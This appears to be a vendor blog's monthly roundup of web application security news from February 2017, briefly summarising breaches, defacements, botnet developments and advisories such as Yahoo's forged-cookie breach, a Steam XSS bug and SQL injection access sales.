Web Application Security News for February 2017

Print Friendly, PDF & Email

This month has brought us hacks from the world over – including a breach at Yahoo, which is possibly linked to a state-sponsored hacker, an XSS Bug in Steam, and reports of a Russian hacker who has sold access details to over 60 universities and Govt agencies, all harvested using SQLi. The WordPress vulnerability that was fixed last month has now been used to deface over a million sites and counting, and a Mirai successor may be on the rise.

Yahoo Warns Users Of Forged Cookies In Third Breach

Yahoo is sending messages to some users alerting them to the use of forged cookies to access their data in a third breach of customer accounts in 2015-2016, CNBC reports. Some of these hacks are attributed to a “state-sponsored actor” also involved with the 2014 Yahoo breach in which 500 million accounts were compromised.

Valve Patches Trivial XSS Bug in Steam

Valve Corp., has patched a cross-site scripting vulnerability on its popular Steam gaming platform that could be exploited by viewing a maliciously crafted profile.
The flaw could allow an attacker to carry out phishing attacks or execute malicious scripts just by opening a crafted profile page…

Russian-Speaking Hacker Sells SQLi for Unauthorized Access to Over 60 Universities and Government Agencies

  • Rasputin’s latest victims include over 60 (combined total) prominent universities and federal, state, and local U.S. government agencies.
  • Rasputin, a Russian-speaking and notorious financially-motivated cyber criminal, continues to locate and exploit vulnerable web applications via a proprietary SQL injection (SQLi) tool.
  • In November 2016, Rasputin penetrated the U.S. Election Assistance Commission (EAC) via SQLi.
  • 15 plus years of SQLi attacks, and going strong; this prolific vulnerability remains one of the most popular exploits for opportunistic actors due to its ongoing success rate.
  • Economic incentives are required to change the behavior that facilitates SQLi vulnerabilities either through penalties established by government regulations (sticks) or tax abatement incentives (carrots) for compliance.


Geographic locations of Rasputin’s latest U.S. education and government victims.
New Self-Healing Malware Targets Online Shops Running on Magento

… whenever a user places a new order, the malware starts execution. Then, the malicious database trigger executes before the Magento platform even puts together the PHP and assembles the page, reads a blog post signed by Willem de Groot, the researcher who analyzed the malware discovered by Jaroen Boersma.
The query, he says, checks for the existence of the malware in the header, footer, copyright, and every CMS block. If it doesn't find anything, it re-adds itself…

Carders capitalize on Cloudflare problems, claim 150 million logins for sale

Filed under proof or it didn't happen… but we still don't know the full impact of Cloudflare's incident

Hacker Group Defaces Hundreds of Websites After Hacking UK Hosting Firm

…A hacking crew that goes by the name of National Hackers Agency (NHA) has defaced 605 websites in one go after they managed to get access to a server from UK hosting firm DomainMonster.
The attacks, brought to Bleeping Computer's attention by a member of another hacking crew, took place on Tuesday, February 21, and were all cached via Zone-H, a service that archives defaced websites…
…On Twitter, the company acknowledged the attacks but gave little details about what happened. No official statement was published on its site, or one that we could find. All the websites we checked from the defaced list are now up and running….

Florida Man Pleads Guilty To Clinton Foundation Hack Attempts

Timothy Sedlak of Florida has pleaded guilty to the charge of attempting to gain unauthorized access to the network of the charitable organization run by the Clintons, allegedly making 390,000 unsuccessful tries to hack its server, reports Reuters, quoting prosecutors. This comes in the wake of a 42-year jail term handed down separately to Sedlak by Orlando court for producing and possessing child pornography.

Necurs Botnet Gets Proxy Module with DDOS Capabilities

The massive Necurs botnet, known for sending large spam campaigns, including the Locky ransomware that's been infecting countless computers, might soon be turned into a DDOS tool…
After a bit of work on this particular module, researchers realized there was a command that would cause the bot to start making HTTP or UDP requests to an arbitrary target in an endless loop – a DDOS attack…

Advisory: Java/Python FTP Injections Allow for Firewall Bypass (Attack scenarios include SSRF, XXE and more)

Recently, an vulnerability in Java's FTP URL handling code has been published which allows for protocol stream injection. It has been shown that this flaw could be used to leverage existing XXE or SSRF vulnerabilities to send unauthorized email from Java applications via the SMTP protocol. While technically interesting, the full impact of this protocol stream injection has not been fully accounted for in existing public analysis…

Criminals Monetizing Attacks Against Unpatched WordPress Sites

.. Criminals have inevitably begun to attempt to monetize attacks against WordPress sites still vulnerable to a severe REST API endpoint vulnerability silently patched in the recent 4.7.2 security update.
While more than one million websites have been defaced, researchers are now beginning to see some defacements leave behind links to rogue pharmaceutical websites trying to spam users into buying drugs or lure them into phishing scams for their payment card information…

If you would like information on how the Barracuda Web Application Firewall can help you protect your resources, visit our corporate site here.


Tushar Richabadas is a Product Manager for the Barracuda Web Application Firewall team in our India office. You can connect with him on LinkedIn here.

 

Scroll to top
Tweet
Share
Share